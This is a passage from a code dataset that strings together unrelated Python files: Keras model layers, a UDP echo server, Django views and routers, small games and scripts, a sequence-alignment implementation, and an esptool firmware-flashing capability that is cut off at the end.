Add, \\\n Concatenate, Embedding, LayerNormalization, MultiHeadAttention, Dropout\nfrom pathlib import Path\n\n########################################\n# SAVE/LOAD FUNCTION #\n########################################\ndef save_model(model, layer_index, CONST_SAVED_MODEL_DIR):\n # Save the trained model\n Path(f\"{CONST_SAVED_MODEL_DIR}_{layer_index}\").mkdir(parents=True, exist_ok=True)\n print(\"SAVE MODEL PATH\", f\"{CONST_SAVED_MODEL_DIR}_{layer_index}\")\n try:\n model.save(f\"{CONST_SAVED_MODEL_DIR}_{layer_index}\", save_format=\"tf\")\n except Exception:\n print(\"exception saved model to h5 format\")\n model.save(f\"{CONST_SAVED_MODEL_DIR}_{layer_index}/saved_model.h5\")\n\ndef load_saved_model(path):\n print(\"LOAD MODEL PATH\", path)\n if path != \"\" and path is not None:\n model = load_model(f\"{path}\")\n\n return model\n\n\n########################################\n# MODEL/LAYER #\n########################################\nclass BanHead(tf.keras.Model):\n def __init__(self, pattern, use_relu=False, config={}):\n super(BanHead, self).__init__()\n self._pattern = pattern\n self._use_relu = use_relu\n self._config = config\n\n def call(self, inputs):\n if inputs.dtype.base_dtype != self._compute_dtype_object.base_dtype:\n inputs = tf.cast(inputs, dtype=self._compute_dtype_object)\n\n if self._use_relu:\n # --- Add the relu here\n inputs = tf.keras.layers.ReLU()(inputs)\n dist = tf.keras.layers.ReLU()(self._pattern)\n else:\n dist = self._pattern\n\n # KL-divergence loss\n if self._config[\"loss\"] == \"kl\":\n kl = tf.keras.losses.KLDivergence(reduction=tf.keras.losses.Reduction.NONE)\n pattern_probs = tf.nn.softmax(dist, axis=-1)\n logits_probs = tf.nn.softmax(inputs, axis=-1)\n x = kl(pattern_probs, logits_probs)\n # x = kl(dist, inputs)\n x = tf.expand_dims(x, axis=-1)\n # MSE loss\n elif self._config[\"loss\"] == \"mse\":\n if self._config[\"num_of_pattern_per_label\"] == 1:\n x = (inputs - dist) ** 2\n x = tf.reduce_mean(x, 1, keepdims=True)\n else:\n x = (inputs - dist) ** 2\n x = tf.reduce_mean(x, 0)\n x = tf.reduce_mean(x, 1, keepdims=True)\n\n return x\n\nclass PatternModel(tf.keras.Model):\n def __init__(self, config, **kwargs):\n super(PatternModel, self).__init__(**kwargs)\n self._config = config\n\n def build(self, input_shape):\n self.variable = tf.Variable(\n initial_value=tf.ones(shape=(self._config[\"output_nodes\"],)),\n trainable=True if self._config[\"use_flexible_pattern\"] is True else False\n )\n # self._dense = Dense(self._config[\"output_nodes\"])\n super(PatternModel, self).build(input_shape)\n\n def call(self, inputs):\n if inputs.dtype.base_dtype != self._compute_dtype_object.base_dtype:\n inputs = tf.cast(inputs, dtype=self._compute_dtype_object)\n\n return inputs * self.variable\n # return self._dense(inputs)\n\ndef createPatternModel(config):\n output_nodes = config[\"output_nodes\"]\n\n inputs = []\n outputs = []\n for i in range(config[\"num_of_pattern_per_label\"]):\n input = Input(shape=output_nodes)\n inputs.append(input)\n output = PatternModel(config)(input)\n outputs.append(output)\n\n model = Model(inputs=inputs, outputs=outputs)\n return model\n\ndef createNormalModel(config):\n input_shape = config[\"input_shape\"]\n use_bias = config[\"use_bias\"]\n activation = config[\"activation\"]\n output_nodes = config[\"output_nodes\"]\n\n inputs = Input(shape=input_shape)\n x = Flatten()(inputs)\n out = Dense(output_nodes, use_bias=use_bias)(x)\n\n if activation == \"sigmoid\":\n out = tf.keras.activations.sigmoid(out)\n elif activation == \"tanh\":\n out = tf.keras.activations.tanh(out)\n\n model = Model(inputs=inputs, outputs=out)\n\n return model\n\ndef createModel(config):\n model = createNormalModel(config)\n\n return model","repo_name":"canboy123/ban","sub_path":"lib/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":4368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"39742262704","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport socket\n\ns = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\ns.bind(('localhost', 9999))\nwhile True:\n data, addr = s.recvfrom(1024)\n data = data.decode('utf-8')\n print('%s ==> %s' % (addr, data))\n reply = 'Hello, %s!' % data\n print('%s <== %s' % (addr, reply))\n s.sendto(reply.encode('utf-8'), addr)\ns.close()\n","repo_name":"ArisQ/learn-python","sub_path":"52_udp/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"26577028794","text":"from .models import Touristik_hudular, Category\n\ndef latest_news(request):\n latest_news = Touristik_hudular.chiqarish.all().order_by('-yozilgan_vaqti')\n kategoriyalar = Category.objects.all()\n\n context = {\n 'latest_news': latest_news,\n 'kategoriyalar': kategoriyalar\n }\n return context","repo_name":"ruzikulovdev/Sayyoh-kundaligi","sub_path":"Tourism/context_processor.py","file_name":"context_processor.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"20646576783","text":"import random\n\ndef pickRandom(range):\n randnum = random.randrange(range)\n return randnum\ndef flipManyCoins(numOfCoins):\n count = 0\n headCount = 0\n tailCount = 0\n while count < numOfCoins:\n if flipACoin() == \"heads\":\n headCount += 1\n else:\n tailCount += 1\n count += 1\n return 'You Had %d Tails and %d Heads!' % (tailCount, headCount)\n\ndef flipACoin():\n randNum = pickRandom(2)\n if randNum == 0:\n return \"heads\"\n else:\n return \"tails\"\n\ndef flipCoin(string):\n if string == \"fifty\":\n print(flipACoin())\n elif string == \"chance\":\n print(\"How many coins would you like to flip?\")\n answer = input()\n try:\n print(flipManyCoins(int(answer)))\n except ValueError:\n print(\"please enter a number\")\n flipCoin(\"chance\")\n\ndef promptUser():\n print(\"CoinFlip or Higher/Lower?(C/H)\")\n answer = input()\n if answer == \"C\":\n isCoinFlip()\n elif answer == \"H\":\n isHigherLower()\n\ndef isCoinFlip():\n print(\"Are You Playing for a 50/50 flip? (Y/n)\")\n Yn = input()\n if Yn == \"Y\":\n flipCoin(\"fifty\")\n elif Yn == \"n\":\n flipCoin(\"chance\")\n\ndef pickANum():\n print(\"Pick a number from 1-99\")\n answer = input()\n try:\n if int(answer) > 99:\n print (\"please pick a number from 1 to 99\")\n pickANum()\n else:\n aRand = pickRandom(101)\n if int(answer) < aRand:\n print(\"Lower!\")\n print(\"The Random Number Picked:\",aRand)\n elif int(answer) > aRand:\n print(\"Higher!\")\n print(\"The Number Picked:\", aRand)\n else:\n print(\"Whoa! You got even!\")\n except ValueError:\n print(\"please enter a NUMBER\")\n pickANum()\n\ndef numPicked():\n firstRand = pickRandom(101)\n secRand = pickRandom(101)\n print(\"Your random number is:\",firstRand)\n if firstRand < secRand:\n print(\"LOWER!\")\n print(\"The Higher Number Picked:\", secRand)\n else:\n print(\"HIGHER!\")\n print(\"The Lower Number Picked:\", secRand)\n\ndef isHigherLower():\n print(\"Do you want a number picked for you? (Y/n)\")\n if input() == \"Y\":\n numPicked()\n else:\n pickANum()\n\nprint(\"Welcome to Coin Toss or Higher Lower!\")\npromptUser()\n","repo_name":"insipx/100-Program-Challenge-Python-","sub_path":"HighLowHeadsTails/hlht.py","file_name":"hlht.py","file_ext":"py","file_size_in_byte":2380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"11371599527","text":"import argparse\nimport asyncio\nimport collections\nimport uuid\n\nimport aiohttp\n\nConfig = collections.namedtuple('Config', ['url', 'read_concurrency', 'runs', 'load_rate'])\n\n\ndef read_config():\n parser = argparse.ArgumentParser()\n parser.add_argument('--target', help='target url of the load test', default='http://localhost:8080')\n parser.add_argument('--read_concurrency', type=int, help='number of concurrent reader', default=10)\n parser.add_argument('--runs', type=int, help='number of times single test is run', default=100)\n parser.add_argument('--rate', type=float, help='time in seconds to wait before firing the next test', default=2.0)\n\n args = parser.parse_args()\n\n return Config(url=args.target, read_concurrency=args.read_concurrency, runs=args.runs, load_rate=args.rate)\n\n\nasync def read_ncco(session, url, bucket_id, ncco_id):\n render_url = f'{url}/bucket/{bucket_id}/ncco/{ncco_id}/render'\n await session.get(render_url)\n\n\nasync def load_job(session, url, read_concurrency):\n # Create bucket\n create_bucket_url = f'{url}/bucket'\n bucket_id = str(uuid.uuid4())\n await session.post(create_bucket_url, json={'id': bucket_id})\n\n # Create NCCO\n ncco_body = {'ncco': '[{\"action\": \"talk\", \"text\": \"Hello World!\"}]'}\n create_ncco_url = f'{url}/bucket/{bucket_id}/ncco'\n\n res = await session.post(create_ncco_url, json=ncco_body)\n\n res_json = await res.json()\n ncco_id = res_json['ncco_id']\n\n # spin read_concurrency readers\n outstanding = []\n for _ in range(read_concurrency):\n task = asyncio.ensure_future(read_ncco(session, url, bucket_id, ncco_id))\n outstanding.append(task)\n\n # wait for readers\n await asyncio.gather(*outstanding)\n\n # delete bucket\n await session.delete(f'{url}/bucket/{bucket_id}')\n\n\nasync def run_test(config):\n # spin a load job every load_rate seconds\n outstanding = []\n\n async with aiohttp.ClientSession(raise_for_status=True) as session:\n for _ in range(config.runs):\n task = asyncio.ensure_future(load_job(session, config.url, config.read_concurrency))\n outstanding.append(task)\n asyncio.sleep(config.load_rate)\n\n await asyncio.gather(*outstanding)\n\n\ndef main():\n config = read_config()\n\n loop = asyncio.get_event_loop()\n future = asyncio.ensure_future(run_test(config))\n loop.run_until_complete(future)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"lpedrosa/nccostorage","sub_path":"tests/load/test_heavy_read.py","file_name":"test_heavy_read.py","file_ext":"py","file_size_in_byte":2438,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"74095880772","text":"from api.authentication.viewsets import (\n RegisterViewSet,\n LoginViewSet,\n ActiveSessionViewSet,\n LogoutViewSet,\n)\nfrom rest_framework import routers\nfrom api.user.viewsets import UserViewSet\n\nrouter = routers.SimpleRouter(trailing_slash=False)\n\nrouter.register(r\"edit\", UserViewSet, basename=\"user-edit\")\n\nrouter.register(r\"register\", RegisterViewSet, basename=\"register\")\n\nrouter.register(r\"login\", LoginViewSet, basename=\"login\")\n\nrouter.register(r\"checkSession\", ActiveSessionViewSet, basename=\"check-session\")\n\nrouter.register(r\"logout\", LogoutViewSet, basename=\"logout\")\n\nurlpatterns = [\n *router.urls,\n]\n","repo_name":"app-generator/django-react-soft-dashboard","sub_path":"django-api/api/routers.py","file_name":"routers.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","stars":91,"dataset":"github-code","pt":"44"} +{"seq_id":"868378683","text":"import sys\nimport csv\ndef main():\n check_command_line_arg()\n output = []\n try:\n with open(sys.argv[1], \"r\") as csv_file:\n csv_read = csv.DictReader(csv_file)\n for row in csv_read:\n split_name = row[\"name\"].split(\",\")\n output.append({\"first\":split_name[1].lstrip(), \"last\":split_name[0], \"house\":row[\"house\"]})\n # print(output)\n with open(sys.argv[2], \"w\") as output_file:\n csv_write = csv.DictWriter(output_file, fieldnames=[\"first\", \"last\", \"house\"])\n csv_write.writerow({\"first\" : \"first\", \"last\" : \"last\", \"house\" : \"house\"})\n for row in output:\n csv_write.writerow({\"first\" : row[\"first\"], \"last\" : row[\"last\"], \"house\" : row[\"house\"]})\n except FileNotFoundError:\n print(\"File Not Exist\")\n\n\n\n\n\n\ndef check_command_line_arg():\n if(len(sys.argv)) < 3:\n sys.exit(\"Too few command-line arguments\")\n if(len(sys.argv)) > 3:\n sys.exit(\"Too many command-line arguments\")\n if \".csv\" not in sys.argv[1] and \".csv\" not in sys.argv[2]:\n sys.exit(\"Not a CSV file\")\n\nif __name__ == \"__main__\":\n main()","repo_name":"SubhashiniRajesh26/python_harvard-and-other-tasks","sub_path":"week6/scourgify/scourgify.py","file_name":"scourgify.py","file_ext":"py","file_size_in_byte":1167,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"73550990532","text":"import os\r\n\r\nfrom django.conf import settings\r\nfrom django.shortcuts import redirect, render, HttpResponse\r\n\r\nfrom emee_manage import models\r\nfrom emee_manage.utils.form import UploadForm,UploadModelForm\r\n\r\ndef upload_form(req):\r\n if req.method == \"GET\":\r\n form = UploadForm()\r\n return render(\r\n req,\r\n \"upload_form.html\",\r\n {\r\n \"title\": \"Form上传\",\r\n \"form\":form,\r\n \"req\":req,\r\n }\r\n )\r\n form = UploadForm(data=req.POST,files=req.FILES)\r\n if form.is_valid():\r\n img_obj = form.cleaned_data.get(\"img\")\r\n print(type(img_obj))\r\n db_img_path = os.path.join(\"static\",\"img\",img_obj.name)\r\n img_path = os.path.join(\"emee_manage\",db_img_path)\r\n f = open(img_path,mode=\"wb\")\r\n for chunk in img_obj.chunks():\r\n f.write(chunk)\r\n f.close()\r\n models.Boss.objects.create(\r\n name=form.cleaned_data['name'],\r\n age=form.cleaned_data['age'],\r\n img=db_img_path\r\n )\r\n return HttpResponse(\"上传成功\")\r\n return render(\r\n req,\r\n \"upload_form.html\",\r\n {\r\n \"title\": \"Form上传\",\r\n \"form\":form,\r\n \"req\":req,\r\n }\r\n )\r\n\r\ndef upload_modelform(req):\r\n if req.method == \"GET\":\r\n form = UploadModelForm()\r\n return render(\r\n req,\r\n \"upload_form.html\",\r\n {\r\n \"title\":\"ModelForm上传\",\r\n \"form\":form,\r\n \"req\":req\r\n }\r\n )\r\n # print(req.FILES)\r\n form = UploadModelForm(data=req.POST,files=req.FILES)\r\n if form.is_valid():\r\n form.save()\r\n return redirect(\"/city/list/\")\r\n return render(\r\n req,\r\n \"upload_form.html\",\r\n {\r\n \"title\":\"ModelForm上传\",\r\n \"form\":form,\r\n \"req\":req\r\n }\r\n )\r\n\r\ndef upload_list(req):\r\n queryset = models.City.objects.all().order_by(\"id\")\r\n return render(\r\n req,\r\n \"city_list.html\",\r\n {\r\n \"city_queryset\":queryset,\r\n \"req\":req,\r\n }\r\n )\r\n\r\ndef city_edit(req):\r\n i = req.GET.get(\"nid\")\r\n # print(i)\r\n if req.method == \"GET\":\r\n city = models.City.objects.filter(id=i).first()\r\n form = UploadModelForm(instance=city)\r\n return render(\r\n req,\r\n \"change.html\",\r\n {\r\n \"form\": form,\r\n \"title\": \"编辑城市\",\r\n \"req\": req,\r\n },\r\n )\r\n print(req.FILES)\r\n print(req.POST)\r\n return redirect(\"/city/list/\")\r\n # city = models.City.objects.filter(id=i).first()\r\n # form = UploadModelForm(data=req.POST, files=req.FILES, instance=city)\r\n # if form.is_valid():\r\n # form.save()\r\n # return redirect(\"/city/list/\")\r\n # return render(\r\n # req,\r\n # \"change.html\",\r\n # {\r\n # \"form\": form,\r\n # \"title\": \"编辑城市\",\r\n # \"req\": req,\r\n # },\r\n # )\r\n\r\n\r\n\r\ndef city_delete(req):\r\n i = req.GET.get(\"nid\")\r\n path = models.City.objects.filter(id=i).first().img\r\n q_path = os.path.join(str(settings.MEDIA_ROOT),str(path))\r\n models.City.objects.filter(id=i).delete()\r\n os.remove(q_path)\r\n return redirect(\"/city/list/\")","repo_name":"banxianjia/Django-Study","sub_path":"emee_manage/views/upload.py","file_name":"upload.py","file_ext":"py","file_size_in_byte":3450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"8837557657","text":"'''\nAlgorithmic Thinking, Part II\nProject 4. Computing global and local alignments\n\n@author: Yueleng & Kexin\n'''\n\n\ndef build_scoring_matrix(alphabet, diag_score, off_diag_score, dash_score):\n\t'''\n\t@input:\n\ta set of characters alphabet: A C G T - or Sigma union -\n\tdiag_score: M_{sigma, sigma}\n\toff_diag_score: M_{sigma, sigma'}\n\tdash_score: M_{sigma, -} = M_{-, sigma}\n\n\t@output: distionary of dictionaries.\n\t'''\n\tscores = {}\n\tscores['-'] = {'-': dash_score}\n\n\tfor let_a in alphabet:\n\t\tif let_a not in scores:\n\t\t\tscores[let_a] = {} #create a dictionary under scores[let_a]\n\t\tscores[let_a]['-'] = dash_score\n\t\tscores['-'][let_a] = dash_score\n\n\t\t# Fill in other keys for dictionary: scores[let_a]\n\t\tfor let_b in alphabet:\n\t\t\tif let_a == let_b:\n\t\t\t\tscores[let_a][let_b] = diag_score\n\t\t\telse:\n\t\t\t\tscores[let_a][let_b] = off_diag_score\n\n\treturn scores\n\ndef _clip(value, global_flag):\n\t'''\n\tLimit values to 0 when global_flag is not set\n\t'''\n\treturn value if global_flag else max(0, value)\n\n\ndef compute_alignment_matrix(seq_x, seq_y, scoring_matrix, global_flag):\n\t'''\n\t@input:\n\tseq_x, seq_y: whose elements share a common alphabet with the scoring matirx \n\tscoring matrix: output of func build_scoring_matrix\n\tglobal_flag: True/False. \n\t\t\t\t if True, use Algorithm from Q8\n\t\t\t\t if False, use Algorithm from Q12, i.e. S[i,j] assigned with 0 if negative.\n\t'''\n\trows, cols = len(seq_x), len(seq_y)\n\n\t#initialize alignment\n\t#first row and first column not used!\n\talignment = [[0 for _ in range(cols + 1)] for _ in range(rows + 1)]\n\tfor idx_i in range(1, rows + 1):\n\t\talignment[idx_i][0] = _clip(alignment[idx_i - 1][0] + scoring_matrix[seq_x[idx_i - 1]]['-'], global_flag)\n\n\tfor idx_j in range(1, cols + 1):\n\t\talignment[0][idx_j] = _clip(alignment[0][idx_j - 1] + scoring_matrix['-'][seq_y[idx_j - 1]], global_flag)\n\n\tfor idx_i in range(1, rows + 1):\n\t\tfor idx_j in range(1, cols + 1):\n\t\t\talignment[idx_i][idx_j] = max([\n\t\t\t\t_clip(alignment[idx_i - 1][idx_j - 1] + scoring_matrix[seq_x[idx_i - 1]][seq_y[idx_j - 1]], global_flag),\n\t\t\t\t_clip(alignment[idx_i - 1][idx_j] + scoring_matrix[seq_x[idx_i - 1]]['-'], global_flag),\n\t\t\t\t_clip(alignment[idx_i][idx_j - 1] + scoring_matrix['-'][seq_y[idx_j - 1]], global_flag)\n\t\t\t\t])\n\n\treturn alignment\n\ndef compute_global_alignment(seq_x, seq_y, scoring_matrix, alignment_matrix):\n\t'''\n\t@input:\n\tseq_x, seq_y: whose elements share a common alphabet with the scoring matirx;\n\tscoring matrix: output of func build_scoring_matrix;\n\talignment matrix: output of func compute_global_alignment;\n\n\t@output: tuple of the form (score, align_x, align_y)\n\twhere score is the score of the global alignment,\n\talign_x and align_y should have the same length and may include \n\tthe padding characters '-';\n\t'''\n\treturn compute_alignment(seq_x, seq_y,\n\t\t\t\t\t\t\t scoring_matrix,\n\t\t\t\t\t\t\t alignment_matrix,\n\t\t\t\t\t\t\t global_flag = True)\n\ndef compute_local_alignment(seq_x, seq_y, scoring_matrix, alignment_matrix):\n\t'''\n\tSee Q13 of Homework.\n\tStart the traceback from the entry in S that has the maximum value over the entire matrix \n\tand trace backwards using exactly the same technique as in ComputeGlobalAlignment. \n\tStop the traceback when the first entry with value 0 is encountered. \n\tIf the local alignment matrix has more than one entry that has the maximum value, \n\tany entry with maximum value may be used as the starting entry.\n\t'''\n\treturn compute_alignment(seq_x, seq_y,\n\t\t\t\t\t\t\t scoring_matrix,\n\t\t\t\t\t\t\t alignment_matrix,\n\t\t\t\t\t\t\t global_flag = False)\n\n\ndef compute_alignment(seq_x, seq_y, scoring_matrix, alignment_matrix, global_flag):\n\t'''\n\tUniversal function for computing global and local alignments\n\t'''\n\tidx_i, idx_j = len(seq_x), len(seq_y)\n\tif not global_flag:\n\t\t# i.e. global_flag == False, which means the local case.\n\t\tidx_i, idx_j = max_index(alignment_matrix, len(seq_x), len(seq_y))\n\tbest_score = alignment_matrix[idx_i][idx_j]\n\tnew_xs, new_ys = '', ''\n\n\tdef cond_global(idx_i, idx_j):\n\t\t'''\n\t\tCondition for while loops in global mode\n\t\t'''\n\t\tif idx_j is None:\n\t\t\treturn idx_i != 0\n\t\telif idx_i is None:\n\t\t\treturn idx_j != 0\n\t\telse:\n\t\t\treturn idx_i != 0 and idx_j != 0\n\n\tdef cond_local(idx_i, idx_j):\n\t\t'''\n\t\tCondition for while loops in local mode\n\t\t'''\n\t\treturn alignment_matrix[idx_i][idx_j] != 0\n\n\tcond = cond_global if global_flag else cond_local\n\n\twhile cond(idx_i, idx_j):\n\t\tif alignment_matrix[idx_i][idx_j] == _clip(alignment_matrix[idx_i - 1][idx_j - 1] + scoring_matrix[seq_x[idx_i - 1]][seq_y[idx_j - 1]], global_flag):\n\t\t\tnew_xs = seq_x[idx_i - 1] + new_xs\n\t\t\tnew_ys = seq_y[idx_j - 1] + new_ys\n\t\t\tidx_i, idx_j = idx_i - 1, idx_j - 1\n\t\telif alignment_matrix[idx_i][idx_j] == _clip(alignment_matrix[idx_i - 1][idx_j] + scoring_matrix[seq_x[idx_i - 1]]['-'], global_flag):\n\t\t\tnew_xs, new_ys = seq_x[idx_i - 1] + new_xs, '-' + new_ys\n\t\t\tidx_i -= 1\n\t\telse:\n\t\t\tnew_xs, new_ys = '-' + new_xs, seq_y[idx_j - 1] + new_ys\n\t\t\tidx_j -= 1\n\n\twhile cond(idx_i, None if global_flag else idx_j):\n\t\tnew_xs, new_ys = seq_x[idx_i - 1] + new_xs, '-' + new_ys\n\t\tidx_i -= 1\n\n\twhile cond(None if global_flag else idx_i, idx_j):\n\t\tnew_xs, new_ys = '-' + new_xs, seq_y[idx_j - 1] + new_ys \n\t\tidx_j -= 1\n\n\treturn best_score, new_xs, new_ys\n\n\ndef max_index(alignment, rows, cols):\n\t'''\n\tPosition of max item in the matrix\n\t'''\n\tmax_i, max_j = 0, 0\n\tfor idx_i in range(rows + 1):\n\t\tfor idx_j in range(cols + 1):\n\t\t\tif alignment[idx_i][idx_j] > alignment[max_i][max_j]:\n\t\t\t\tmax_i, max_j = idx_i , idx_j \n\n\treturn max_i, max_j\n\n\n\n","repo_name":"Yueleng/IIPP","sub_path":"AT_Week7And8/Homework/project4.py","file_name":"project4.py","file_ext":"py","file_size_in_byte":5445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"19492338306","text":"import os\nimport re\nimport time\nfrom typing import Callable, List, NoReturn, Optional\n\nfrom gazoo_device import decorators\nfrom gazoo_device import errors\nfrom gazoo_device import gdm_logger\nfrom gazoo_device.capabilities.interfaces import flash_build_base\nfrom gazoo_device.capabilities.interfaces import switchboard_base\n\n\nlogger = gdm_logger.get_logger()\n\ntry:\n # pylint: disable=g-import-not-at-top\n import esptool\n _ESPTOOL_AVAILABLE = True\nexcept ImportError:\n _ESPTOOL_AVAILABLE = False\n\n_DEFAULT_BOOT_UP_TIMEOUT_SECONDS = 30\n_SWITCHBOARD_CAPABILITY = 'switchboard'\n\n# Default flash argumnets used with esptool. For details refer to\n# https://docs.espressif.com/projects/esptool/en/latest/esp32/esptool/index.html#esptool-py\n_BAUDRATE = 460800\n_BEFORE_FLASH = 'default_reset'\n_AFTER_FLASH = 'hard_reset'\n_FLASH_MODE = 'keep'\n_FLASH_FREQ = 'keep'\n_FLASH_SIZE = 'detect'\n_APPLICATION_OFFSET = 0x20000\n_PARTITION_OFFSET = 0x8000\n_BOOTLOADER_OFFSET = 0x1000\n\n\nclass FlashBuildEsptool(flash_build_base.FlashBuildBase):\n \"\"\"Esptool implementation of flash_build capability.\"\"\"\n\n def __init__(\n self,\n device_name: str,\n chip_type: str,\n serial_port: str,\n switchboard: Optional[switchboard_base.SwitchboardBase] = None,\n wait_for_bootup_complete_fn: Optional[Callable[[int], None]] = None,\n reset_endpoints_fn: Optional[Callable[[str], None]] = None,\n boot_up_time: int = _DEFAULT_BOOT_UP_TIMEOUT_SECONDS,\n baud: int = _BAUDRATE,\n before: str = _BEFORE_FLASH,\n after: str = _AFTER_FLASH,\n flash_mode: str = _FLASH_MODE,\n flash_freq: str = _FLASH_FREQ,\n flash_size: str = _FLASH_SIZE,\n application_offset: int = _APPLICATION_OFFSET,\n partition_offset: int = _PARTITION_OFFSET,\n bootloader_offset: int = _BOOTLOADER_OFFSET):\n \"\"\"Initializes an instance of the FlashBuildEsptool capability.\n\n For details related to before/after flash arguments refer to\n https://docs.espressif.com/projects/esptool/en/latest/esp32/esptool/advanced-options.html#reset-modes\n For details related to flash mode, ferq, size arguments refer to\n https://docs.espressif.com/projects/esptool/en/latest/esp32/esptool/flash-modes.html\n\n Args:\n device_name: Device name used for logging.\n chip_type: The target device's chip type.\n serial_port: Device serial port.\n switchboard: A Switchboard capability instance if the device supports it.\n wait_for_bootup_complete_fn: The wait_for_bootup_complete method. This\n method will be called after flashing is complete. If not specified,\n time.sleep(boot_up_time) will be used to wait for boot up.\n reset_endpoints_fn: Method to reset matter_endpoint capability.\n This method will be called after flashing is completed.\n boot_up_time: The time to wait for boot up sequence to complete.\n baud: Baudrate for device serial communication.\n before: Action to perform before flashing.\n after: Action to perform after flashing is complete.\n flash_mode: Mode for flashing.\n flash_freq: Clock frequency for SPI flash interactions.\n flash_size: Size of the SPI flash to use.\n application_offset: Memory offset in hex format to flash application\n binary.\n partition_offset: Memory offset in hex format to flash partition-table\n binary.\n bootloader_offset: Memory offset in hex format to flash bootloader binary.\n\n Raises:\n DependencyUnavailableError: If esptool is not installed.\n ValueError: If chip_type is not supported.\n \"\"\"\n if not _ESPTOOL_AVAILABLE:\n raise errors.DependencyUnavailableError(\n '\"esptool\" is not installed. \"esptool\" is not included due to '\n 'licensing restrictions. To enable flashing for this device type, '\n 'install \"esptool\": \"pip install esptool>=3.2\".')\n\n if chip_type not in esptool.CHIP_LIST: # pytype: disable=module-attr\n raise ValueError(f'Chip {chip_type} not supported by esptool.')\n\n super().__init__(device_name=device_name)\n self._serial_port = serial_port\n self._chip_type = chip_type\n self._flash_args = {\n 'baud': baud,\n 'before': before,\n 'after': after,\n 'flash_mode': flash_mode,\n 'flash_freq': flash_freq,\n 'flash_size': flash_size,\n 'application_offset': application_offset,\n 'partition_offset': partition_offset,\n 'bootloader_offset': bootloader_offset,\n }\n self._switchboard = switchboard\n self._wait_for_bootup_complete_fn = wait_for_bootup_complete_fn\n self._reset_endpoints_fn = reset_endpoints_fn\n self._boot_up_time = boot_up_time\n\n @decorators.CapabilityLogDecorator(logger)\n def _get_write_command_arguments(self, erase: bool = False) -> List[str]:\n \"\"\"Helper function to get write command arguments.\n\n For details please refer to\n https://docs.espressif.com/projects/esptool/en/latest/esp32/esptool/scripting.html#embedding-into-custom-scripts\n\n Args:\n erase: True to use erase-all option when flashing, else False.\n\n Returns:\n Arguments required for flashing.\n \"\"\"\n basic_command_args = [\n '--port', self._serial_port, '--baud', self._flash_args['baud'],\n '--chip', self._chip_type, '--before', self._flash_args['before'],\n '--after', self._flash_args['after']\n ]\n write_command_args = [\n 'write_flash', '--flash_freq', self._flash_args['flash_freq'],\n '--flash_mode', self._flash_args['flash_mode'], '--flash_size',\n self._flash_args['flash_size'], '--compress'\n ]\n if erase:\n write_command_args.append('--erase-all')\n return basic_command_args + write_command_args\n\n @decorators.CapabilityLogDecorator(logger)\n def _verify_file(self, image_path: str, ends_with: str = '.bin') -> None:\n \"\"\"Helper function to validate image file.\n\n Args:\n image_path: Path to the image file.\n ends_with: Expected image suffix. E.g. bootloader files are expected to\n have suffix 'bootloader.bin'.\n\n Raises:\n ValueError: If the image file suffix does not end with 'ends_with' arg.\n FileNotFoundError: If image file does not exist.\n \"\"\"\n if not image_path.endswith(ends_with):\n raise ValueError(f'Only {ends_with} type file can be flashed.')\n if not os.path.exists(image_path):\n raise FileNotFoundError(f'Firmware image {image_path} does not exist.')\n\n @decorators.CapabilityLogDecorator(logger)\n def flash_device(self,\n list_of_files: List[str],\n expected_version: Optional[str] = None,\n expected_build_type: Optional[str] = None,\n verify_flash: bool = True,\n method: Optional[str] = None,\n erase_flash: bool = False) -> None:\n \"\"\"Flashes the firmware image (.bin file) on the device.\n\n Args:\n list_of_files: List of image files on local host in following order\n [build_file_name, bootloader_file_name, partition_table_file_name].\n expected_version: Not used.\n expected_build_type: Not used.\n verify_flash: Not used. 'esptool' always verifies flashed image.\n method: Not used.\n erase_flash: True if everything needs to be erased before flashing.\n\n Raises:\n ValueError: If list of files is empty, all values are None or list length\n is more than 3.\n \"\"\"\n del expected_version, expected_build_type, verify_flash, method # Unused.\n if len(list_of_files) != 3:\n raise ValueError('Only application, bootloader, partition table files can'\n ' be flashed via esptool. If only flashing one type'\n ' please set others to None.')\n if not any(list_of_files):\n raise ValueError('No firmware files provided to flash the device.')\n\n command = self._get_write_command_arguments(erase=erase_flash)\n\n offset_types = [\n 'application_offset', 'bootloader_offset', 'partition_offset'\n ]\n ends_with = ['.bin', 'bootloader.bin', 'partition-table.bin']\n for image, offset_type, ends_with in zip(list_of_files, offset_types,\n ends_with):\n if image is not None:\n self._verify_file(image, ends_with)\n command += [self._flash_args[offset_type], image]\n\n command = list(map(str, command))\n\n # Close serial connection from GDM to avoid conflict with esptool flashing.\n if self._switchboard is not None:\n self._switchboard.close_all_transports()\n\n logger.info(f'Executing esptool command: {command}')\n esptool.main(command) # pytype: disable=module-attr\n\n if self._switchboard is not None:\n self._switchboard.open_all_transports()\n\n if self._flash_args['after'] == _AFTER_FLASH:\n if self._wait_for_bootup_complete_fn:\n self._wait_for_bootup_complete_fn(self._boot_up_time)\n else:\n time.sleep(self._boot_up_time)\n\n # For Matter device classes, we'll need to reset the Matter endpoint mapping\n # as the supported endpoints might change after flashing a new build.\n if self._reset_endpoints_fn is not None:\n self._reset_endpoints_fn()\n\n @decorators.CapabilityLogDecorator(logger)\n def extract_build_info(self, *args, **kwargs) -> NoReturn:\n \"\"\"Converts the provided build arguments into info about the build.\"\"\"\n raise NotImplementedError(\n 'extract_build_info is not available in flash_build_esptool for now.')\n\n @decorators.CapabilityLogDecorator(logger)\n def upgrade(\n self,\n build_file: Optional[str] = 